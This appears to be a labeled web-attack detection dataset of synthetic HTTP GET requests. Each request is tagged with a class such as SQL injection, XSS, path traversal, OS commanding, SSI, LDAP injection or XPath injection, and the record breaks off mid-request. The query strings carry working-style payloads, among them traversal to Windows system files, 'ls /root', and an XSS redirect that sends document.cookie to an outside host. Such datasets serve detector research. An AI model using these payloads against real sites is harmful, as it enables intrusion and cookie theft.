GET /tDD/hMB/5vEyb530tgDRsq42.jpeg?w9fsaminptwgtuX=t24&ty=4iseihheDea&is=u1.&yalorsimt7ldo=st%3Fsiep+u&xaa0d8umirpanok=p-ea%27&trpetylSTanaera=Mxsan&tettnhtus=e%3B%3FhN+c%7Euwhomepcopnt&bhhel=u%3Dftd&3itss=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&HuaatEV=h9z.EK_lX7a&irort3relA1En=vRp6q2Y4pv&n6=wupdate HTTP/1.1
Host: 149.95.141.157
Connection: keep-alive
Accept: video/mpeg;q=0.3, image/gif, image/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 44.208.226.169
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="45"
Date: Wed, 10 Feb 10 16:40:54 CET
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Mon, 13 Mar 06 09:33:33 GMT
If-Match: *
If-None-Match: "MzcsACYnhVi0VBe"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 54
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="6glonc"
Range: -709
Referer: http://www.zeudr.org/iMwtez/Vnt5/teessd/baueext.avi
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.1 (X11; U; Unix 0.2; 4f-ez; rv:3.8.6) Gecko/97287080
UA-CPU: 68000
UA-Disp: 911,8166,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5892x3688
Via: frtav/9.5 www.gmlTv.css, FTP/4.2 243.202.97.221:0663
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45593
Start - Id: 38613
class: LdapInjection
GET /oinjqar3nkdmq/9rnBMTaQFKg5.jpg?uzCKstyleH=%29+%28++++%7C%28+cn%3D*o+%27brien*%29%28mail++%3D*o+++%27brien*+++%29+++&oeiAlfsW=in+rscript%7E+us%29w2+i%27%40&rfsent=cwcteil HTTP/1.0
Host: 110.26.240.228:80
Connection: close
Accept: application/*;q=0.6, video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.1, compress, deflate
Accept-Language: Ddntc-qsenrt, fOa-o, eh-irs
Cache-Control: only-if-cached
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="74"
Date: Sat, 21 Aug 04 21:07:26 UTC
ETag: W/"AE4FKwVz7jYAaW.hJ"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Thu, 19 Jul 07 05:18:49 UTC
If-Unmodified-Since: Sun, 19 Nov 06 15:50:15 UTC
If-Match: *
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "jS8_NKk2acADu6izVoC"
Max-Forwards: 2116
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: e8bit dAimya=iueu5his
Range: -348176
Referer: /elht/53jz/oheui/faLgdr/3TrlsO.tar
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: oazrlpe/5.8.9.1.4
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: aeott/6.5 www.a3ho.js, nlt/1.7 104.104.8.64, 5.7 82.102.217.225
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 557 www.qUo1.jpeg "esote5naNsdrk" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38613
Start - Id: 43288
class: OsCommanding
GET /tcHPBqy/and3RkA3Ormk@h.shtml?_eWgPsP.9=%5Cnls++%2Froot%2F&shea0eLmn=iAiehicrfnh&nv7dptlrars=+Trwoie347Veoptpd&F8ftIGleRsood=aYUpXE-4mc HTTP/1.0
Host: 125.149.195.142
Connection: close
Accept: application/*, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: max-age=494
Client-ip: 41.151.127.122
Cookie: gn=eulb;ttntoi=ysT|w;eui2Hryt=yale<;9LtfnlT76fw=oiff;hIhmaroeyOdode=mateorahcchh;he8Pc1ouehtltm=9874261
Cookie2: $Version="805"
Date: Wed, 14 Jun 06 24:02:33 CET
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: Si140to
From: fztees@dntsngao.be
If-Modified-Since: Wed, 29 Apr 09 24:35:56 CET
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: *
If-Range: "A2TyCF9GdOW3dAO"
Max-Forwards: 8
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: JatJdx oxavao=ekawLex
Range: 3992-
Referer: http://mdYa.uk/seH3hnn/ouhmnun/rretnitg/rseaiode.php3
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: ufnuoyl/5.0.8.8.3
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: deflate
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 75919
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43288
Start - Id: 48147
class: XSS
GET /ifahemoiehdtnr0bt.cfm?lrlesEriosn2htk=from&il=%3Cobject+classid+%3D++%22++++clsid%3A...++%22+++codebase+++%3D++++%22javascript%3A+++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.elartide.com%2Fcgi-bin%2Fsetrsiar.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.1
Host: www.2meEsoDinr.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: emlrrTbq-se;q=0.3
Cookie2: $Version="137"
Date: Mon, 14 Apr 08 08:52:45 CET
ETag: "edxaARqn7vBqEGl"
From: etoe9@uoeb.st
If-Unmodified-Since: Wed, 29 Aug 07 03:27:19 CET
If-Match: "H1RdAYLo-D@-p5FgUF_B"
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 992
Pragma: no-cache
Referer: http://Boet4.uk/2tmeew/ukgna/Latk/lsae.php3
Trailer: Host
User-Agent: eltEqQU http://www.ticss.uk
Transfer-Encoding: gzip
Warning: 439 www.QtRf.js "tgeri" "Fri, 24 Nov 06 11:59:29 CET"

null

End - Id: 48147
Start - Id: 35209
class: SqlInjection
GET /tY/sn4B/ettaqnTl2eoeko8aryi/Atw4uat/cshZfesbWaoloItdtzA/NnyeanhyenzeuSlutNd/.0dhM2K8/HEefanetam/Eeg.exe?hhsrunlesoage=4tndndn&i4lrh=7sZapZjF9o&tetimvs=95&F8nhinsertevalQ72KM=%27++++or+++id+in++++%28++select+++++*+++++from+++++++user_db++++%29&N.oW=osesr1hteaergNuhtk HTTP/1.0
Host: 187.71.55.138:1578
Connection: tisc
Accept: audio/basic, text/html;q=0.9
Accept-Charset: iso-2022-kr;q=0.1, iso-8859-1
Accept-Encoding: identity, compress, compress;q=0.2, deflate;q=0.2, deflate
Accept-Language: lH1pdtp-nFyn0
Cache-Control: max-stale
Client-ip: 247.223.116.97
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="8"
Date: Fri, 05 Dec 08 12:05:27 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: 1sbtaan@lile.com
If-Modified-Since: Mon, 22 Aug 05 17:54:11 CET
If-Unmodified-Since: Wed, 01 Nov 06 05:35:13 UTC
If-Match: "_LaY3b0Sp0D@khE-OU"
If-None-Match: "kUWZ@JeHVBkKUlilNx"
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 34
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: Basic aGVkQlZicGk6ZGFoZA==
Range: -30216,36258-
Referer: /aioayo/mtcazhs/8oeiM/nngf.asmx
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/5.7 (Windows; U; Windows NT 3.0; ul-ar; rv:7.9.6) Gecko/51139535
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: deflate
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 068 www.d4or.htm "ickomuotietSeActn" "Sat, 29 Jul 06 19:25:24 UTC"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35209
Start - Id: 45663
class: PathTransversal
GET /nbese33sb/na/kslafkaMcsmwyfeNc/2I/d_R8Mfeiw-hXdEiDjna/londfrepgnxmuu/ssetsatflie2depWtad/nmHz2VvZJ@l0r3X/3i85phpOoepeincludeH.gif?ecbmattdtxf=wDB4X&AincludeincludeEOj28Y-P=oQ1b0op_o-_h&GAI25DHjqs.=dnhalanoncjrlwo&hrs1cz9nQ=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fllrastntri%2Fndnsng%2Frins%2Falll.dll&ntemeH7hal7ns=hseu&mofiimoxmtdmi=ebgsoundst%3Dnnfm&i5rf=53044004&uma=FealhNTkg&omie2esc=115929 HTTP/1.0
Host: 15.197.216.90
Connection: Rtqx
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.6, windows-1257;q=0.5, euc-cn;q=0.5, windows-1257, big5;q=0.9
Accept-Encoding: 
Accept-Language: seoedhu-d;q=0.2, id6-iseah, sltnb5-dBi3scF6;q=0.0
Cache-Control: max-stale
Client-ip: 10.24.0.201
Cookie: abhtfI=A;pitimt=lud8pii;au06cDey0=kFsoyrsfei9e hc;vunberdsas=scpJU-mca
Cookie2: $Version="46"
Date: Fri, 05 Mar 10 06:39:49 CET
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 27 Jul 06 19:38:34 CET
If-Unmodified-Since: Sun, 16 Nov 08 16:28:08 GMT
If-Match: "ofys@.AssqT_m.awi"
If-None-Match: *
If-Range: Wed, 04 Mar 09 17:38:24 GMT
Max-Forwards: 49
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest qop=teco
Range: 92916-
Referer: http://atccaorq.be/tetkbVj/dfitatT/reRf2/j4hihh62.php4
TE: gzip;q=0.3
Trailer: Cache-Control
User-Agent: pbN5riwenFt
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: identity
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 291 www.olf39o.jpg "uhsenbent4l" "Tue, 24 Jan 06 02:46:29 UTC"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45663
Start - Id: 43534
class: OsCommanding
GET /rlZ.css?3srydtan1voat=1&qD0Q1VC0U5X=4oh6+&eiehUraozrtoeTe=%7Cid%253b&DE2QdropENn=276&82ro=deeurt&dtfhedZr=+teb&61qBiframe=lDG&daaqbkpklc=r8&eUzutgNo=d%25a&aaCamrdS3A=J&ihtaha1ae=tinLt+e4fttn&dgkznpIitis=lh%3Bh+%26daq+-t%5B HTTP/1.0
Host: www.fgw8ri.org
Connection: keep-alive
Accept: text/xml, application/rtf
Accept-Charset: windows-1258, gb2312, x-mac-japanese;q=0.7, hz-gb-2312, iso-8859-1
Accept-Encoding: 
Accept-Language: nc9entge-n, noxttwq-eecraoe, roe-paesllmt;q=0.2, ee-i3d;q=0.6, gneeomy-intae1a
Cache-Control: only-if-cached
Client-ip: 214.70.1.175
Cookie: oiqnlrTnnumjt=83;anba3nreaar=iTqlFYqb;6qaYsne0=hd;etrenhni=unycmni;x3LwYVmeta3mail=6415
Cookie2: $Version="985"
Date: Tue, 15 May 07 15:54:02 CET
ETag: W/"aavGB.agmn6xrluXFo8"
Expect: hhdoic
From: sLseahcS@fLazt.org
If-Modified-Since: Sun, 12 Jul 09 19:21:06 CET
If-Unmodified-Since: Fri, 21 Dec 07 23:04:08 GMT
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: "a7u6-YCtucnI9pfpAV4n"
Max-Forwards: 143
MIME-Version: 1.5
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest qop=auth
Range: -983461,45-31195
Referer: /eta1.exe
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: 5we2/1.8.9
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 135x815
Via: 2.8 170.106.50.102:3337
Transfer-Encoding: deflate
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43534
Start - Id: 39283
class: SSI
GET /s-sDZoXFRr@d_kFQ.dll?oajHuT5ifwo6O=q&reUyae=te&Xekei29Nt9t=sps&lshoqn=80266&xenyn7=teensock_streamfE&kc9lp5jaoyor=sjKBMNY&cytlgiite=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&hhw7izwnn1=%29m%40oaT&sx=s&NnsTegtna=8&tsnmei0yo6rt=yee%5Cnrsen&q9evrr=lstWb%3Dl HTTP/1.0
Host: www.tai2ndmrqj.be
Connection: close
Accept: image/gif;q=0.5, text/html, video/*
Accept-Charset: cp-936, macintosh
Accept-Encoding: gzip;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 178.60.27.113
Cookie: uc=7asOooi
Cookie2: $Version="4"
Date: Wed, 12 Oct 05 11:56:40 GMT
ETag: "t7BklJYd9L3k2qZkG"
Expect: 7ehtki=bTu9Ses8;hrEiTf2
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Sun, 29 Nov 09 22:40:49 UTC
If-Match: "Bff2S6Pu.p3Dbrbg2p87"
If-None-Match: *
If-Range: Sat, 05 Sep 09 18:28:50 GMT
Max-Forwards: 63
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Basic ZXVlZTQ6dG9oU2w=
Range: 3-
Referer: /aausni4/eaa5wu/n0e7hhn.dll
TE: chunked,deflate
Trailer: Via
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 4.6; ed-qt; rv:3.4.8) Gecko/87863756
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: scge
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 483 65.103.137.245:57 "ttdilrdtdatlrn" 
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39283
Start - Id: 45319
class: PathTransversal
GET /yHtlogsnlTwlJR/es2goHlFv6i/e2vDSVkIMv/asssraRAo/eiits0aro2fsHe5r/emOLh6PS/xxB/tk3.jpg?irriPifxg=easFktsuHzehtt&hatoksHnqtrbd5s=33&metaushdhrrte=5628836&Aiaar5iAe=qinaqEa%7CmysboRt&epDrtssf=ip%3E8&exnao9inlei=i_QuEj&0l@wTSlrb=e7E&cmeansjeyd=643&thbem9t=bin&DNpositionEi=moTaaEceiDefaeeqeq&BeS2aZyCgl=jyrd8&h4ye6htglehot=E0 HTTP/1.0
Host: www.hbaieloEte.be:104
Connection: keep-alive
Accept: text/xml;q=0.1, application/*;q=0.9
Accept-Charset: iso-8859-15;q=0.2
Accept-Encoding: 
Accept-Language: ioQn-leNofutj, ioeat6-ytah;q=0.1, yneI-rtru;q=0.6, ei-jAec
Cache-Control: only-if-cached
Client-ip: 177.94.93.90
Cookie: 1ine57a=child7\tlqwindow.opensitemPe;Ltaltclflteurv=oltya1rsw1E5y;nneu2f=b:\\WINNT\\win.ini;Estzr=rSCub3rngedhpksaf;ahooi1t=(pyra
Cookie2: $Version="8"
Date: Thu, 11 Oct 07 18:14:27 GMT
ETag: "mcdKigyv7ge9cqILQAv"
Expect: 100-continue
From: clhli@iorhs2mEl.org
If-Modified-Since: Fri, 16 Apr 10 09:34:17 CET
If-Unmodified-Since: Thu, 17 Jul 08 19:52:22 CET
If-Match: "vK67uRhx.ugHDmM_bL"
If-None-Match: "xJdZfau2ICRed0iaotP"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM NDM4ZWVvZXJyaU1tZW5jdXR1aWx2enNzc3dpaHNzb1J0dA==
Authorization: NTLM czkwb2FuMWhyZVM5ZDFyaGl0YWEwUjZlYWE3aGV0OW5KZWpyeW9PdHV0czFpZWVx
Range: -25904
Referer: http://qaez.be/syvem/bbziAo/dmlbio/kefmfatY/ertnh.htm
TE: trailers,trailers,chunked
Trailer: If-Match
User-Agent: N3ecWIsm (a1@.SK4O-o; nm-pjaAh; ezZ1MURR; ekiXv7XIOi)
UA-CPU: Sparc
UA-Disp: 4810,872,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7286x9343
Via: 8.0 30.132.80.231, FTP/7.2 117.19.53.195, 5.9 118.140.134.85
Transfer-Encoding: gzip
Upgrade: ee3n/0.9, she/0.7
Warning: 447 www.ioood.jpg "n8pysra7eb" "Tue, 24 Feb 09 23:10:50 GMT"
X-Forwarded-For: 246.173.52.165
X-Serial-Number: 3763219627316398647
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45319
Start - Id: 40847
class: SSI
GET /r2pwq4te-y0wtyvFP/eBY3QAFioirk2y/e43uDMrhnvei/bNvXncwP0A@6CC/vDgBwKGw1E4BMKw77ek/0X.shtml?iN=%26it%26e8sl%3B%3Eidmrtet1yhome&Ceihtwgnla=%3C%21--+%23odbc+++++statement++%3D+++%22select++l90nkucw%2C+++dv%2C++++l6MRsGi++from+++iilyN0+++++order+++++by++++9%2C+++++24%2C+++0%22++--%3E&t3xsenrns=59064&evdwr=7437&vgku3=%29&tSQpf=tkx&Z@ZEHb2=5511567577&nonwynNrvr=746 HTTP/1.0
Host: www.EgewfrKe4.com
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-age=33805
Client-ip: 183.188.60.40
Cookie: 6eeH=227464225
Cookie2: $Version="9"
Date: Sat, 25 Dec 04 09:02:23 CET
ETag: "c4DJWXpb1.Q0Ita"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.5
Pragma: owspp='oe2s7k'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: /ete4imu/ieerttiu/idHmmt.php4
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: gNa5leleiseago1gn
UA-CPU: PowerPC
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: HTTP/3.4 72.140.155.25, 6.3 32.107.10.68, HTTP/8.1 www.svms.png
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 938964588863184564
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40847
Start - Id: 47878
class: XSS
GET /cjG/rzr5oairot2nia7Avas/e7Dj2@bK2k_OML8K/xectarjlgq/0vpI.GlSLXArD@RJ/cearT36woresootad3/eKVj.A/i7ap-vQd/ayMnac6t/ho3S-XV.kUE/5mUwoirere.jsp?o2har8koyktat=4rWh&DuoGid6br=9&est6sfulamftz=%3Cdiv+++style++%3D+++%22+behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.seorieta.com%2Fscript%2FdiUaeuyizI.sh%5D%29%3B+++%22++%3E HTTP/1.1
Host: www.jdigia.de
Connection: otheEb
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6
Client-ip: 85.234.191.196
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="24"
Date: Tue, 15 Nov 05 18:41:46 CET
ETag: "g@pHW7UV-x7nc7Q"
Expect: lrhe
From: loGrTtE@euoweraEr.be
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: *
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 475
MIME-Version: 0.4
Pragma: yraeie=ctethtA
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Digest cnonce="oqinw"
Range: 064-,-6198,422476-
Referer: /eteoeit/oeoptng/tfiosn.aspx
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/7.4 (X11; U; Open BSD i386 5.6; mh-ie; rv:6.7.4) Gecko/18585524
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: compress
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47878
Start - Id: 39291
class: SSI
GET /d.k5wp-xphtacces2LAjC-/lYmLsqnanorsprszEs/rgtb@ZXGYAEkDQK/9UsGWjhoqxM@9pJitBV/b74sOZ7n/g.dB1UF/sme/tXustVdimohtEVRlP9/exb9qT/Dihtn2rswerme/eOoornqrbi3tgk0/stZpF.shtml?rddr=32242135&tdanhq9nlesg=cSw4kkAoR&nlkaxtHhp7np=asMesrw0f2a4xua&eog1Eyt=pWVbEbFxK-&adiehauhettti3e=670&tmrimri=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&jJI9RwhereOw=jvlr&pDn3iuswnipmelp=573&su=3&mail9a6g=zeformcopysoeiSes+&4iUZ4kXWD=26-FuP8IoW&BQIchildFFdfH=aoeehome%26rhpi&32kwjo=8724 HTTP/1.0
Host: 139.171.68.61
Connection: rrtErtR
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: eeeAdgn=em
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Mon, 28 Dec 09 04:05:02 GMT
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 06 Oct 09 11:18:08 UTC
If-Unmodified-Since: Mon, 27 Jul 09 04:06:42 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 73
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Digest nc=e472deD1
Range: 7-228,-05193
Referer: /coecqxuh.gif
TE: trailers,trailers
Trailer: Host
User-Agent: Ihneui/4.9.0.6
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 573x190
Via: 3.3 149.30.70.113:78675, 8.6 73.154.175.194
Transfer-Encoding: deflate
Upgrade: m0oet/4.8
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39291
Start - Id: 35684
class: XPathInjection
GET /eLHboabuomwdemoA/r.v/delete990Y_Y9/7y8/etb/aaerreths/n98_I.tiff?ahPG2hr8aayghmm=snvagHnb+a%7E&creuepibe=28388&0vQ7UH@WXcopym=lre&himprifpinhJ8=05&a9ibeanittlaew=ElshT&eoekomqrao80wo=+nds&goay6ea=yyno5hc&T@GQKOTG=8379&OA2ALY5=Fen&0m=51Ir%408xr&ruewbtet2e=o40AteGn&tnnl=97073319&9kmt=fhmu%2Feonih%2F9jue4o%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D0%5D+++++%7C+++++suys%2Fh%2FostIr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or+++%27tawzr6%27++%3D%27&hAhESt3=lu91ioixksoyet9aM5&HAzqwkCyHsbM=4784352598 HTTP/1.0
Host: 194.211.13.253
Connection: close
Accept: application/rtf, image/png;q=0.4
Accept-Charset: cp-932;q=0.7, x-mac-cyrillic, isiri-3342, cp-936, shift_jis;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 4hoeoLkVeedmen=7;bfra=hrcp;rmYFFtCnWaq=nph-e;gus07tcu8=4mlvniembyme
Cookie2: $Version="635"
Date: Sun, 21 Jan 07 14:19:46 UTC
ETag: W/"k1U73-zB@DVFTOX"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Sat, 28 Jan 06 13:12:41 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Jun 05 02:17:13 GMT
Max-Forwards: 45
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: NTLM dGhzdXN0aUVudHRudHJucnN5c2RIaG9hb3NlYW0yczNjbTk=
Range: -82,-22
Referer: /row5r/otasaCs1.nsf
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.2 (compatible; MSIE 6.7; Unix; xcnlS)
UA-CPU: PowerPC
UA-Disp: 7059,6973,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 8.8 86.46.65.221, 2.3 81.113.129.190, FTP/1.3 www.td8tP.shtml:1
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35684
Start - Id: 38771
class: LdapInjection
GET /oobbhiiHghai/n@YLWzhjA3boot.initk/oSBr/awyxvvV-tOs/eUws/ensir3oez14rNsoon/iFVMzPWY_b9npX/dPmRz/iew/i1dPihFSO22O.yo@/lhcra9eIuyohefatG/eeEusbth.asmx?1l3uaidudch=09&.YRphpuuK=1338&6h07woebrbieue=02843&M9AJ0vPd=vdyr%28%2B&l6rMv0yt8RuHe=tBiQdG_x%40el&jJMMO_5P5=2915%29%28%26%28objectClass%3Dedh%29%28%7C%28sn++++%3Das%29%28cn%3DR++J*%29%29&eireieln=60&uze=L%3FeBt HTTP/1.1
Host: 217.3.220.26
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.8, x-mac-chinesetrad;q=0.3
Accept-Encoding: gzip;q=0.8
Accept-Language: c4znT-Ses
